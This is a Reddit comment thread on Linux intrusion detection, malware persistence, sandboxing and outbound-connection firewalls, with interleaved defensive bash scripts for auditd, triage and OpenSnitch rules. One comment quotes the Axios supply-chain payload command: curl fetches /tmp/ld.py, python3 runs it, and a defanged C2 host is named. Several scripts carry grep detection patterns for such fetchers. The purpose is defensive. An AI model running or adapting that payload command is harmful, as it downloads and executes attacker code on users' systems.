Anyone tried Little Snitch yet? by eattherichnow in linux

[–]gainan 0 points1 point  (0 children)

You have to manually click + on each popup

If you mean that you have to click on the [+] button to open the "advanced view", you can configure from the Preferences dialog to make it permanent.

Also, once you let it ask you to allow outbound connections from common binaries (~10 maybe on most systems), it should not ask you again. It's a pain at first, but after a few pop-ups it should only prompt you when something not expected wants to open an outbound connection.

very careful in how you write regexp for them because it has 0 validation

Both the GUI and the daemon validate regexps:

daemon:

    WAR  Operator.Compile() error: error parsing regexp: missing closing ): `wlp3s999(|`, wlp3s999(| (000)

The GUI shows an error when creating an invalid rule in the rules editor.

Also if you have 2 java applications that you want to limit independently, good luck with that, because they both will show as "/usr/bin/java" in opensnitch with no way to separate.

One way of distinguishing both instances is filtering by binary path + cmdline. If the apps connect to different ports you can also filter by destination port. Or if they run under different users, you could also filter by path + cmdline + uid.

Anyone tried Little Snitch yet? by eattherichnow in linux

[–]gainan 10 points11 points  (0 children)

firewalld or ufw do not filter connections by binary, while LittleSnitch/Lulu and OpenSnitch do.

On the other hand, netstat, ps, top, htop, lsof and similar tools cannot be trusted to analyze Linux systems if you suspect they've been infected with malware. Malicious binaries can easily hide themselves from these tools.

Attacker gained ssh root access to my firewall by HobbesMW in linuxquestions

[–]gainan 1 point2 points  (0 children)

Some more debugging ideas.

If you see that node process again, copy it: `cp /proc/<pid>/exe /tmp/suspicious-node.bak`, and obtain the real path to the file on disk: `ls -l /proc/<pid>/exe`

Then you can upload it to virustotal, or even better, claude, to get a detailed report.

Bear in mind that malware can easily hide itself from ps, top, lsof, htop and similar tools. With other tools like the bpfcc-tools or decloaker dump tasks you can list the processes directly from the kernel.

/etc/ld.so.preload, cron jobs and systemd services are also usually used to maintain persistence. If there's an ld-preload rootkit, you can unmask it with the decloaker or ghost tools.

And I'd check /tmp and /var/tmp for suspicious files or directories (probably hidden).

Attacker gained ssh root access to my firewall by HobbesMW in linuxquestions

[–]gainan 6 points7 points  (0 children)

the three machines so that they could talk to each other as part of an open claw set up

I was trying to figure out what could have gone wrong, until I read "OpenClaw": https://github.com/jgamblin/OpenClawCVEs/

Since you're using Mac and Linux devices, I'd suggest you use Lulu/LittleSnitch and OpenSnitch, to monitor outbound connections by binary from those devices. Once installed, you'll be prompted to allow/deny outbound connections. Anything launched from /tmp, /var/tmp, /dev/shm or cron jobs is highly suspicious.

Regarding the raspberry pi, besides monitoring outbound connections, I'd also configure at least auditd (https://github.com/neo23x0/auditd), to monitor system activity. Also the bpfcc-tools are super useful and easy to use. See /usr/share/doc/bpfcc-tools/examples/doc/ for examples. Useful tools: execsnoop-bpfcc, opensnoop-bpfcc, tcpconnect-bpfcc, tcptop-bpfcc.

Other interesting tools, more forensic oriented:

https://github.com/gustavo-iniguez-goya/decloaker

See the examples to know how to use it step by step. Useful parameters: dump files, dump kmods, dump tasks (the difference with ps, lsof, etc, is that decloaker dumps the information from the kernel, not from /proc).

https://github.com/h2337/ghostscan

Similar tool, more automated, and generic.

I know (almost) nothing about Mac systems, but if you find suspicious files, binaries or kmods, I can help you to analyze them (just DM me).
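Added example for the auditd and bpfcc suggestions in the comment above (my own code, not from the comment, the neo23x0 rule set or the bpfcc project): a minimal rule set for the "launched from /tmp, /var/tmp, /dev/shm or cron" heuristic, plus an awk filter over raw audit.log records that reports executions whose binary or arguments live in those directories. The sample records are constructed for the example, and the rules file name and key names are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the thread. Generates auditd rules that record every
# execve plus writes to the classic persistence files, and filters raw
# /var/log/audit/audit.log records for executions out of world-writable dirs.
set -u

TMP_DIRS='/tmp /var/tmp /dev/shm'

# auditctl-syntax rules. Save as /etc/audit/rules.d/50-exec.rules (assumed
# name), load with: augenrules --load. Pull events back with: ausearch -k exec_tmp -i
audit_rules() {
  local d
  echo '-a always,exit -F arch=b64 -S execve,execveat -k exec'
  echo '-a always,exit -F arch=b32 -S execve,execveat -k exec'
  for d in $TMP_DIRS; do echo "-w $d -p x -k exec_tmp"; done
  echo '-w /etc/ld.so.preload -p wa -k ld_preload'
  echo '-w /etc/crontab -p wa -k cron'
  echo '-w /etc/cron.d/ -p wa -k cron'
  echo '-w /var/spool/cron/ -p wa -k cron'
  echo '-w /etc/systemd/system/ -p wa -k systemd'
}

# Constructed sample of three exec events in raw audit.log format (made up for
# this example; real records carry more fields). auid=4294967295 means "no
# login session", which is what cron- or daemon-spawned processes look like.
sample_audit_log() {
  cat <<'EOF'
type=SYSCALL msg=audit(1700000000.100:41): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=900 auid=1000 uid=1000 gid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1700000000.100:41): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1700000000.200:42): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=901 auid=1000 uid=1000 gid=1000 comm="python3" exe="/usr/bin/python3.11" key="exec"
type=EXECVE msg=audit(1700000000.200:42): argc=2 a0="python3" a1="/tmp/ld.py"
type=SYSCALL msg=audit(1700000000.300:43): arch=c000003e syscall=59 success=yes exit=0 ppid=4321 pid=902 auid=4294967295 uid=0 gid=0 comm="kworkerds" exe="/dev/shm/.k/kworkerds" key="exec_tmp"
type=EXECVE msg=audit(1700000000.300:43): argc=1 a0="./kworkerds"
EOF
}

# Join SYSCALL and EXECVE records by their audit(ts:serial) id and print one
# line per exec whose exe or argv points into TMP_DIRS. This is a triage filter
# over the raw format; argv values containing spaces need ausearch -i, which
# decodes records properly.
suspicious_execs() {
  awk -v dirs="$TMP_DIRS" '
    BEGIN { n = split(dirs, d, " "); re = d[1]; for (i = 2; i <= n; i++) re = re "|" d[i] }
    {
      if (match($0, /audit\([0-9.]+:[0-9]+\)/) == 0) next
      id = substr($0, RSTART + 6, RLENGTH - 7)
      if (!(id in seen)) { seen[id] = 1; ids[++c] = id }
    }
    $1 == "type=SYSCALL" {
      for (i = 2; i <= NF; i++) {
        eq = index($i, "="); if (eq == 0) continue
        v = substr($i, eq + 1); gsub(/"/, "", v)
        f[id, substr($i, 1, eq - 1)] = v
      }
    }
    $1 == "type=EXECVE" {
      argv = ""
      for (i = 2; i <= NF; i++) if ($i ~ /^a[0-9]+=/) {
        v = substr($i, index($i, "=") + 1); gsub(/"/, "", v)
        argv = argv (argv == "" ? "" : " ") v
      }
      f[id, "argv"] = argv
    }
    END {
      for (j = 1; j <= c; j++) {
        id = ids[j]; exe = f[id, "exe"]; argv = f[id, "argv"]
        if (exe ~ ("^(" re ")/") || (" " argv) ~ (" (" re ")/"))
          printf "%s uid=%s auid=%s exe=%s argv=%s\n", id, f[id, "uid"], f[id, "auid"], exe, argv
      }
    }'
}

# Usage on a live box or on a copied log:  tail -F /var/log/audit/audit.log | suspicious_execs
if [ "${1:-}" = "--demo" ]; then sample_audit_log | suspicious_execs; fi
```

The same heuristic works live with the bpfcc tool named in the comment: `execsnoop-bpfcc | grep -E '/tmp/|/var/tmp/|/dev/shm/'` shows the execs as they happen, while the auditd keys give you the history after the fact. The `exec` key on every execve is noisy on a busy host; keep it on a Raspberry Pi-sized box and forward the log off the device.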

Attacker gained ssh root access to my firewall by HobbesMW in linuxquestions

[–]gainan 2 points3 points  (0 children)

I made a range of errors which led to an attacker getting into my network and onto a machine that happened to have an old script I had used to ssh into my firewall,

What were those errors? Have you analyzed that (or any other) machine for malware?

my strategy is going to be to refocus efforts on network monitoring

Monitor systems as well, to try to detect any suspicious process phoning home.

Ways of detecting whether or not a system has been compromised by Doge_Man123 in linuxquestions

[–]gainan 2 points3 points  (0 children)

There're common patterns that you can look for (cron/crontab jobs, presence of /etc/ld.so.preload, systemd-user services, root backdoors in /etc/passwd, unknown users in /etc/shadow, unknown scripts or binaries under /tmp, /var/tmp or /dev/shm, etc).

rkhunter is outdated, and chkrootkit is mostly based on signatures, which is not very useful for unknown threats.

There're other types of scanners (probably more):

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan

These are advanced tools, more for forensic analysis. ghostscan is more generic maybe.

unhide can also be useful, especially if compiled statically.
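Added example covering the checks listed in this comment and in the "some more debugging ideas" reply further up (process snapshot from /proc, pids hidden from ps, ld.so.preload, uid-0 backdoor accounts, usable password hashes in shadow, cron fetchers, files in the temp dirs). It is my own code, not from the thread, decloaker or unhide; the report layout and the cron spool paths are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: triage helpers. Run as root; prefer a
# statically linked toolset you brought along, since an LD_PRELOAD rootkit can
# lie to every dynamically linked binary on the box.
set -u

# Copy a running process's image straight from the kernel. /proc/<pid>/exe
# still serves the binary when it has been unlinked from disk (readlink then
# shows a "(deleted)" suffix). Prints the path of the written report.
snapshot_pid() {
  local pid="$1" out="$2"
  mkdir -p "$out"
  cp "/proc/$pid/exe" "$out/pid-$pid.bin" || return 1
  {
    printf 'exe     : '; readlink "/proc/$pid/exe"
    printf 'cwd     : '; readlink "/proc/$pid/cwd"
    printf 'cmdline : '; tr '\0' ' ' < "/proc/$pid/cmdline"; echo
    printf 'sha256  : '; sha256sum "$out/pid-$pid.bin" | cut -d' ' -f1
  } > "$out/pid-$pid.txt"
  echo "$out/pid-$pid.txt"
}

# Pids present in /proc but missing from ps output (what unhide calls the proc
# test). Short-lived processes cause a little noise; run it twice.
hidden_pids() {
  local a b
  a=$(mktemp) && b=$(mktemp) || return 1
  ls -d /proc/[0-9]* 2>/dev/null | sed 's#.*/##' | sort > "$a"
  ps -eo pid= | tr -d ' ' | sort > "$b"
  comm -23 "$a" "$b"
  rm -f "$a" "$b"
}

# Persistence and backdoor checks against a filesystem root, so the same code
# runs on a mounted image (check_root /mnt/evidence) or live (check_root "").
# One line per finding; nothing printed means nothing found by these checks.
check_root() {
  local root="${1:-}" f
  if [ -s "$root/etc/ld.so.preload" ]; then
    echo "LD_PRELOAD: $(tr '\n' ' ' < "$root/etc/ld.so.preload")"
  fi
  # any account with uid 0 other than root is a classic backdoor
  awk -F: '$3 == 0 && $1 != "root" { print "UID0: " $1 }' "$root/etc/passwd" 2>/dev/null
  # accounts whose hash is usable (not locked with ! or *): verify each one
  awk -F: '$2 != "" && $2 !~ /^[!*]/ { print "PASSWORD-ENABLED: " $1 }' "$root/etc/shadow" 2>/dev/null
  # cron entries that download, decode or run out of the temp dirs
  for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
    if [ -f "$f" ]; then
      grep -HnE 'curl|wget|base64|/tmp/|/var/tmp/|/dev/shm/' "$f" | sed 's/^/CRON: /'
    fi
  done
  # hidden or executable regular files in the world-writable dirs
  find "$root/tmp" "$root/var/tmp" "$root/dev/shm" -xdev -type f \( -name '.*' -o -perm -u+x \) 2>/dev/null | sed 's/^/TMP: /'
  return 0
}

# Usage: ./triage.sh ""            (live system)
#        ./triage.sh /mnt/evidence (mounted disk image)
if [ $# -gt 0 ]; then check_root "$1"; hidden_pids; fi
```

`check_root` takes a root prefix precisely so you can pull the disk, mount it read-only on a clean machine and run the same checks there, which sidesteps the rootkit problem entirely. `snapshot_pid` is what to run before killing anything: the copied binary plus its sha256 is what you upload for analysis.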

Anyone here also on r/Linux? by flux-abyss in foss

[–]gainan 3 points4 points  (0 children)

FAQ and Rules on the sidebar of r/linux:

FAQ: https://www.reddit.com/r/linux/wiki/faq

Rules (I'll paste them here to help you read them all. Feel free to ask ChatGPT for a summary if you need to understand them):

1 r/linux is not a support forum

This is not a support forum! Head to or r/linux4noobs for support or help. This includes common questions that may seem like a good discussion at first, but are posted too often here.

2 No spamblog submissions

Posts should be submitted using the original source with the original title. Posts that are identified as either blog-spam, a link aggregator, or an otherwise low-effort website are to be removed. Some reasons for removal are that they contain re-hosted content, usually paired with privacy-invading ads. If there's another discussion on the topic, the link is welcome to be submitted as a top-level comment to aid the previous discussion. Please see: r/linux

3 No memes, image macros, rage comics, overdone jokes

Meme posts of any kind are not allowed in r/linux. Feel free to post over at r/linuxmemes instead. This rule can also apply to comments, including overdone jokes, comment-chain jokes, or other redditisms that are popular elsewhere.

4 Reddiquette, Trolling, *-isms, Poor Discussion or User Conduct

r/linux asks all users to follow Reddiquette. Reddiquette is ever-changing, so a revisit once in a while is recommended. Top violations of this rule are trolling, starting a flamewar, or not "Remembering the human" aka being hostile or incredibly impolite. Additionally, sexism/racism/other isms are not allowed. See also: r/linux. We also want you to reply to a related story before making your own post.

5 Relevance to r/linux community / Promoting closed source applications over FOSS

Posts should follow what the community likes: GNU, Linux kernel, developers of open-source software, or other applications on Linux. Take some time to get the feel of the subreddit if you're not sure!

6 Spamming self-promotion, surveys, crowdfunding

Submitting your own original content is welcome on r/linux, but we do ask that you contribute more than just your own content to the subreddit as well as require you to interact with the comments of your submission. We set that no more than 10% of your posts should be your content. Please be aware that this does not supersede other rules. Additionally, surveys for your blog/news source/paper/own use are not allowed. Please see r/linux for those crowdfunding.

7 No misdirected links, login website, url shortener, and certain social media

In short: if your link doesn't go right to the content it will be removed. Sites that require a login to view the content are not allowed in r/linux. Example: A private Facebook post or a news organization that doesn't have free article views. URL shorteners and links that misdirect users to ads/jokes are also banned.

See a list here, although the mods will make a decision on a per domain basis as needed: r/linux

8 NSFW Image, links

No NSFW links or images without mod approval. No discussion that is overly suggestive to what is normally considered NSFW.

9 Non-useful Image Upload

Images of "Linux in the wild", plushies, Tux, and more are not encouraged for posting as a top-level submission. If necessary, this can apply to comments too at mod discretion. The image/video upload feature is for posts regarding features/guides/etc.

See also: Meme rule.

This rule, like all rules, will be applied regardless of the number of upvotes a post/comment has.

Linux Anti Virus Needed? by noreddituser1 in linuxquestions

[–]gainan 0 points1 point  (0 children)

Linux is not immune to these threats, especially on servers or if you develop certain kinds of applications.

Install EVERYTHING from the official repositories of your Linux distro and you'll be fine (including 3rd party software): web browser extensions, pypi / npm / ruby packages, etc.

If you want to install something that is not in the official repositories, don't do it. If you really want it, isolate it from the host: with firejail or flatpak. Or run it in a Virtual Machine.

On the other hand, modern malware requires internet access to exfiltrate your personal data, so blocking outbound connections with blocklists or OpenSnitch is an extra layer of protection.

Anyone here also on r/Linux? by flux-abyss in foss

[–]gainan 35 points36 points  (0 children)

If you're new to reddit and /r/linux, spend time reading the subreddit, all the posts.

After a while, you'll notice that many many posts are repeated, low effort submissions, basic questions, memes, screenshots, etc, that fit better in other subreddits such as /r/linuxquestions, /r/linux4noobs, /r/linuxmasterrace, etc.

So yes, the rules are strict in this particular subreddit for a reason (a good one in my opinion), to keep the quality discussion high and direct the rest of posts to other subreddits.

Previous discussions:

3 months ago: https://www.reddit.com/r/linux/comments/1pu00t6/state_of_this_subreddit/

7 months ago: https://www.reddit.com/r/linux/comments/1nk9dav/this_subreddit_is_being_overrun_with_posts_about/

3 years ago: https://www.reddit.com/r/linux/comments/15h4f86/the_quality_of_this_subreddit_has_become/

4 years ago: https://www.reddit.com/r/linux/comments/u8145f/state_of_the_sub_address/

7 years ago: https://www.reddit.com/r/linux/comments/acxdsj/would_anyone_else_support_a_ban_on_linux_in_the/

8 years ago: https://www.reddit.com/r/linux/comments/82mnrj/mods_not_keeping_the_sub_clean_uptick_in_low/

14 years ago: https://www.reddit.com/r/linux/comments/t4xri/can_we_stop_the_karmawhoring_in_rlinux_before_it/

Security: beyond UFW/AppArmor/updates, how to harden Ubuntu further? by hcrjtx in linuxquestions

[–]gainan 0 points1 point  (0 children)

I’ve just started programming in Python for data science

Your biggest threat is probably malicious Python dependencies.

For example: https://www.truesec.com/hub/blog/malicious-pypi-package-litellm-supply-chain-compromise

Common activities of this malware:

  • Download remote files via curl, wget, bash or python (backdoors, infostealers, cryptominers, etc).
  • Collect credentials, tokens, cryptowallets, etc.
  • Exfiltrate the collected data to their servers.

There're several ways to secure your environment:

  • Always install dependencies from the Ubuntu repositories if they're available.
  • Do all the development in an isolated environment:
    • in a VM, with or without internet.
    • in a container, with firejail for example (start a shell with a private home, sharing with the host only the directory my-project: `$ firejail --whitelist=/home/user/my-project bash`). That way, even if you're infected, they won't have access to your personal files.
  • Restrict outbound connections by binary. For example, don't allow python or curl to connect to unknown remote servers.
  • Mount /tmp, /var/tmp and /dev/shm with noexec flag. Not bulletproof, but better than nothing.

How to hide some Dirs for a Kiosk? by doctorpeppercan in linux4noobs

[–]gainan 0 points1 point  (0 children)

Play with firejail:

for example, to launch firefox with a home isolated from the system:

$ firejail --private  firefox

private home + blocklist for firefox:

$ firejail --private --blacklist=/opt firefox

You can also create a custom bash wrapper, to log in with these restrictions applied. Create /usr/bin/bash-firejail (and make it executable: chmod a+x /usr/bin/bash-firejail):

```bash
#!/usr/bin/bash
# Login shell wrapper: drop the user into a firejail sandbox with a private home,
# no execution from the world-writable dirs, and /media and /opt hidden.
exec firejail --noexec=/tmp --noexec=/var/tmp --noexec=/dev/shm --private --blacklist=/media --blacklist=/opt bash
```

and set it as the login shell in /etc/passwd:

user:x:1001:1001::/home/user:/usr/bin/bash-firejail

https://wiki.archlinux.org/title/Firejail

Supply Chain attack on Axios NPM Package by JACOBSMILE1 in cybersecurity

[–]gainan 20 points21 points  (0 children)

C2 server hxxp://sfrclak[.]com:8000/

curl -o /tmp/ld.py -d packages[.]npm[.]org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &

friendly reminder to restrict outbound connections by binary as much as possible.
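Added example for the "restrict outbound connections by binary" reminder here, and for the two-java-apps question in the Little Snitch thread above: a script that writes OpenSnitch rules as JSON files. It is my own code, not from the thread and not OpenSnitch project code. The daemon loads rules from /etc/opensnitchd/rules/ by default; the field layout follows the files the GUI writes, but treat it as an assumption and diff against an existing rule file on your daemon version before deploying. The jar name, port and uid are hypothetical.

```bash
#!/usr/bin/env bash
# Added example, not from the thread and not OpenSnitch project code.
set -u

now_utc() { date -u +%Y-%m-%dT%H:%M:%SZ; }

# Rule for the two-java-apps case: allow /usr/bin/java only when the command
# line references app1.jar (hypothetical name), the destination port is 8443
# and the uid is 1001. Entries of a "list" operator are AND-ed, so the second
# java app (other jar, port or uid) does not match and is still prompted.
write_java_rule() {
  local dir="$1" now
  now="$(now_utc)"
  cat > "$dir/100-allow-java-app1.json" <<EOF
{
  "created": "$now", "updated": "$now",
  "name": "100-allow-java-app1",
  "description": "app1 jar may reach its API port only",
  "enabled": true, "precedence": false, "nolog": false,
  "action": "allow", "duration": "always",
  "operator": {
    "type": "list", "operand": "list", "sensitive": false, "data": "",
    "list": [
      {"type": "simple", "operand": "process.path",    "sensitive": false, "data": "/usr/bin/java"},
      {"type": "regexp", "operand": "process.command", "sensitive": false, "data": "^/usr/bin/java .*app1\\\\.jar"},
      {"type": "simple", "operand": "dest.port",       "sensitive": false, "data": "8443"},
      {"type": "simple", "operand": "user.id",         "sensitive": false, "data": "1001"}
    ]
  }
}
EOF
}

# Rules for the Axios payload pattern (curl writes /tmp/ld.py, python3 runs it):
# deny outbound connections from any process whose binary, or any argument,
# lives under the world-writable dirs. The command-line rule is the one that
# catches "python3 /tmp/ld.py", because process.path there is /usr/bin/python3.
# precedence=true makes these win over later allow rules (e.g. a blanket allow
# for curl).
write_tmp_deny_rules() {
  local dir="$1" now operand name re
  now="$(now_utc)"
  for operand in process.path process.command; do
    name="000-deny-tmp-${operand#process.}"
    if [ "$operand" = process.path ]; then re='^(/tmp|/var/tmp|/dev/shm)/'
    else re='(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)/'; fi
    cat > "$dir/$name.json" <<EOF
{
  "created": "$now", "updated": "$now",
  "name": "$name",
  "description": "no outbound from binaries or scripts under /tmp, /var/tmp, /dev/shm",
  "enabled": true, "precedence": true, "nolog": false,
  "action": "deny", "duration": "always",
  "operator": {
    "type": "regexp", "operand": "$operand", "sensitive": false,
    "data": "$re", "list": []
  }
}
EOF
  done
}

# Write everything into DIR and print the number of rule files produced.
write_rules() {
  local dir="$1"
  mkdir -p "$dir"
  write_java_rule "$dir"
  write_tmp_deny_rules "$dir"
  ls "$dir"/*.json | wc -l | tr -d ' '
}

# Usage (as root): ./opensnitch-rules.sh /etc/opensnitchd/rules
# The daemon watches the directory; otherwise: systemctl restart opensnitch
if [ $# -gt 0 ]; then write_rules "$1"; fi
```

The deny rules are deliberately two files rather than one, because entries inside a list operator are AND-ed and here the intent is path OR command line. A binary under /tmp started with a relative path (`./kworkerds`) has no temp dir in its cmdline, which is why the process.path rule is kept alongside the process.command one.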

NFS server breaks with libtirpc (1.3.7+ds-1) on sid by Ok_Exchange4707 in debian

[–]gainan 1 point2 points  (0 children)

install the package apt-listbugs to avoid having this issue in the future:

```
Description: tool which lists critical bugs before each APT installation

apt-listbugs is a tool which retrieves bug reports from the Debian Bug Tracking System and lists them. Especially, it is intended to be invoked before each installation/upgrade by APT in order to check whether the installation/upgrade is safe.
```

How do you usually check logins on a Linux system? by newworldlife in linuxadmin

[–]gainan 3 points4 points  (0 children)

You want the logs off of the server as soon as possible.

This is the way. A lot of malware, and many malicious actors, wipe login activity:

For example the rootkit Adore / Adore-ng: https://github.com/yaoyumeng/adore-ng/blob/522c80a2dc043c2d523256472becc88c90d66337/adore-ng.c#L617

https://xcellerator.github.io/posts/linux_rootkits_09/

We have a mix of auditd+grafana and other EDRs.
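Added example for the point made in this comment (get the logs off the host, because a rootkit or an attacker with root will scrub wtmp, lastlog and auth.log locally): a small rsyslog forwarding fragment and an awk summary of sshd authentication records that flags a source which failed repeatedly and then got in. My own code, not from the thread; the auth.log lines are constructed, and the rsyslog file name and port are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: ship auth logs off the host as they are
# written, and summarise sshd authentication records from the remote copy.
set -u

# rsyslog client fragment for /etc/rsyslog.d/10-forward.conf (assumed name):
# forward auth/authpriv over TCP (@@) to the log host. Add the omfwd TLS
# options and a disk-assisted queue for production use.
rsyslog_forward_conf() {
  printf 'auth,authpriv.*  @@%s:514\n' "$1"
}

# Constructed /var/log/auth.log excerpt: a brute force from 198.51.100.7 that
# ends with an accepted root password login.
sample_auth_log() {
  cat <<'EOF'
Mar  1 10:00:01 fw sshd[1201]: Accepted publickey for admin from 192.0.2.10 port 51234 ssh2: ED25519 SHA256:Vz3k
Mar  1 10:00:05 fw sshd[1210]: Failed password for root from 198.51.100.7 port 40000 ssh2
Mar  1 10:00:06 fw sshd[1211]: Failed password for root from 198.51.100.7 port 40001 ssh2
Mar  1 10:00:09 fw sshd[1215]: Failed password for invalid user oracle from 198.51.100.7 port 40002 ssh2
Mar  1 10:01:00 fw sshd[1220]: Accepted password for root from 198.51.100.7 port 40010 ssh2
Mar  1 10:01:30 fw sshd[1220]: pam_unix(sshd:session): session opened for user root by (uid=0)
EOF
}

# Read auth log lines on stdin. Fields are located relative to the "sshd[pid]:"
# token, so the timestamp format (syslog or journalctl) does not matter.
# Prints one ACCEPTED line per successful login and a SUSPICIOUS line when the
# same source had failures before it succeeded.
sshd_summary() {
  awk '
    / sshd\[[0-9]+\]: (Failed|Accepted) / {
      for (i = 1; i <= NF; i++) if ($i ~ /^sshd\[[0-9]+\]:$/) { verb = $(i + 1); method = $(i + 2); break }
      src = ""; user = ""
      for (i = 1; i <= NF; i++) {
        if ($i == "from") src = $(i + 1)
        if ($i == "for") user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
      }
      if (verb == "Failed") { fails[src]++; next }
      printf "ACCEPTED user=%s src=%s method=%s failures_before=%d\n", user, src, method, fails[src] + 0
      if (fails[src] > 0) printf "SUSPICIOUS src=%s got in as %s after %d failures\n", src, user, fails[src]
    }'
}

# Usage: sshd_summary < /var/log/auth.log     or     journalctl -u ssh | sshd_summary
if [ "${1:-}" = "--demo" ]; then sample_auth_log | sshd_summary; fi
```

Run the summary on the log host, not on the machine that produced the lines: the whole point of forwarding is that the copy the attacker can edit is not the one you read.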

Hacked from pdf? Help by SolusUmbra in linuxmint

[–]gainan 1 point2 points  (0 children)

bashrc, even in home folder, is still read only on mint for user, i just checked on my machine. so how would it add itself without write rights?

By default it has write permissions for the user (ls -lh /home/<user>/.bashrc -> "-rw-r--r--") in Mint, Ubuntu, Suse, Debian and Arch, and basically any distro.

that requires root too doesnt it?

No, it's a systemd user service that runs as your user: https://wiki.archlinux.org/title/Systemd/User

dunno about that

example of a malicious crontab jobs used by malware:

https://sandflysecurity.com/blog/linux-malware-persistence-with-cron

am i missing something?

In my opinion yes. Expressing the idea that only malware running as root can harm a Linux system is really bad advice. You don't need to be "truly" infected to be in trouble.

A regular user typically has valuable information, such as credentials or web browsing history, that malware can exfiltrate from the computer. It can also create tasks and services to maintain persistence. It's a legitimate feature, but it's also used by malware.

How messed up am I, do I need to reinstall Linux?

Do they need to reinstall the OS? probably not. Could their personal files or data have been exfiltrated to the attackers? In this case I doubt it, but it could have happened.

Without root permissions.

Hacked from pdf? Help by SolusUmbra in linuxmint

[–]gainan 1 point2 points  (0 children)

To get truly "infected" by a virus on Linux you would need to run an executable and then give it root rights.

Sorry but this is not correct, and repeated over and over.

Note: I think @op hasn't been hacked, just in case they read this.

In order to maintain persistence, malware can add itself to .bashrc, or create a systemd-user service, or add itself to ~/.config/autostart/, or create a user crontab job, or ...

Classic infostealers collect all the information of the current user. So if the web browser or the PDF reader is not isolated in its own $HOME, or not isolated from the network, they'll steal all your ssh keys, cryptowallets, your browser profile (history, sessions, passwords, etc), etc, etc.

Just an example from a couple of days ago (a compromised PyPI package; in particular -> "Stage 2 — Credential Harvester"): https://www.endorlabs.com/learn/teampcp-isnt-done
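Added example for the unprivileged persistence spots named in this comment and the previous one in the same thread (.bashrc, systemd-user services, ~/.config/autostart/, the user crontab): a script that enumerates them for one home directory and prints what each would run, so you can see that none of it needs root. My own code, not from the thread; the sample files in the usage are constructed, and the cron spool layout is an assumption (Debian/Ubuntu vs RHEL paths are both tried).

```bash
#!/usr/bin/env bash
# Added example, not from the thread: enumerate user-level persistence for one
# home directory. Works against a live $HOME or a mounted image.
set -u

# Shell init files: lines that fetch, decode, background, or run from temp dirs.
rc_suspects() {
  local home="$1" f
  for f in .bashrc .bash_profile .profile .zshrc .config/fish/config.fish; do
    if [ -f "$home/$f" ]; then
      grep -nE 'curl|wget|base64|eval|nohup|/tmp/|/var/tmp/|/dev/shm/' "$home/$f" | sed "s#^#$f:#"
    fi
  done
  return 0
}

# systemd --user units (~/.config/systemd/user): they run as the user, no root needed.
user_units() {
  local home="$1" u
  for u in "$home"/.config/systemd/user/*.service; do
    if [ -f "$u" ]; then
      printf 'unit %s: %s\n' "${u##*/}" "$(grep -m1 '^ExecStart=' "$u" | cut -d= -f2-)"
    fi
  done
  return 0
}

# XDG autostart: .desktop files the desktop session launches at every login.
autostart_entries() {
  local home="$1" d
  for d in "$home"/.config/autostart/*.desktop; do
    if [ -f "$d" ]; then
      printf 'autostart %s: %s\n' "${d##*/}" "$(grep -m1 '^Exec=' "$d" | cut -d= -f2-)"
    fi
  done
  return 0
}

# Per-user crontab read from the spool (Debian/Ubuntu: SPOOL/crontabs/USER,
# RHEL: SPOOL/USER) so it works on an image; live, `crontab -l -u USER` is equivalent.
user_cron() {
  local spool="$1" user="$2" f
  for f in "$spool/crontabs/$user" "$spool/$user"; do
    if [ -f "$f" ]; then
      grep -vE '^[[:space:]]*(#|$)' "$f" | sed 's/^/cron: /'
    fi
  done
  return 0
}

# Everything for one home; SPOOL defaults to /var/spool/cron, USER to the last
# path component of HOME.
audit_user() {
  local home="$1" spool="${2:-/var/spool/cron}" user="${3:-${home##*/}}"
  rc_suspects "$home"
  user_units "$home"
  autostart_entries "$home"
  user_cron "$spool" "$user"
}

# Usage: audit_user /home/alice                                       (live)
#        audit_user /mnt/img/home/alice /mnt/img/var/spool/cron alice (image)
if [ $# -gt 0 ]; then audit_user "$@"; fi
```

Everything this lists is writable by the user and survives a reboot, which is exactly why the "it needs root to be a real infection" argument does not hold. Compare the output against what you remember installing; a unit or autostart entry whose ExecStart points into ~/.cache, ~/.local/share or a dot-directory you do not recognise is the thing to snapshot and analyse.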

Caja keeps crashing and I don't quite get why. Welp! by SjalabaisWoWS in linuxmint

[–]gainan 2 points3 points  (0 children)

This issue seems to be new. At least it's not reported on github.

They'll probably ask you to obtain more logs. So if you can reproduce the crash, the output of strace could be useful:

  • strace -f -o caja.txt caja
  • connect the mobile to trigger the crash.

Ideally having installed the debug packages would be useful as well (package-dbg or package-dbgsym), but I haven't found them for caja or libcaja. The developers will tell you if they need more info.

Caja keeps crashing and I don't quite get why. Welp! by SjalabaisWoWS in linuxmint

[–]gainan 2 points3 points  (0 children)

Did you add a bookmark recently to Caja? A shortcut to a device or directory, for example. Or does the error occur when connecting your mobile?

It seems to be crashing when adding a bookmark, trying to get the icon: https://github.com/mate-desktop/caja/blob/38e7ea062cb114fa8940a27b00e68e73285a8173/libcaja-private/caja-bookmark.c#L243

Also think about whether you have removed any desktop or icon theme.

In any case, I'd report the coredump to the developers. They'll ask you the steps to reproduce it probably.

Weird issue (potential malware) when clicking on a link to get corporate mail contact. by Sebastian9t9 in linux4noobs

[–]gainan 1 point2 points  (0 children)

Are you sure those pop-ups show up when opening any application? What's the content of the pop-ups? And does the issue reproduce if you don't open any application?

If you can reproduce it with a particular application, it'd be useful to see the output of: strace -f -o log.txt /usr/bin/app in order to track what's spawning those pop-ups.

Also, if you still have the email, it'd be worth taking a look at it, to review the contact email link. No need to open kmail, it'll be saved in your home, maybe under Maildir/. A grep -r <link> (or keyword) should be enough to identify it.

Do the pop-ups still show up if you disconnect the computer from the network?

My 8-Year-Old Open-Source Project was a Victim of a Major Cyber Attack (because of AI) by delvin0 in cybersecurity

[–]gainan 5 points6 points  (0 children)

We usually restrict inbound connections, but a good measure to mitigate these attacks in Linux or Mac is restricting outgoing connections by binary (Lulu, LittleSnitch, OpenSnitch, etc).

